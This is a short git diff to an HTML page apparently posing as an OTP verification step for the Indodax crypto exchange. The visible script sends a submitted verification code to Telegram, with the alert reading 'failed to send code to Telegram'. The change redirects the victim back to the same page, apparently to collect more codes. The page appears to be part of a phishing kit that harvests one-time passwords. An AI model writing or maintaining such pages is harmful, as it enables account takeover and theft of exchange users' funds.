--- a/otpidodax.html
+++ b/otpidodax.html
@@ -307,7 +307,7 @@
             .then((response) => response.json())
             .then((data) => {
               if (data.ok) {
-                location.href ="otp.html";
+                location.href ="otpidodax.html";
                 document.getElementById("verificationForm").reset();
               } else {
                 alert("Gagal mengirim kode ke Telegram.");
@@ -321,3 +321,4 @@
   </script>
 </body>
 </html>
+
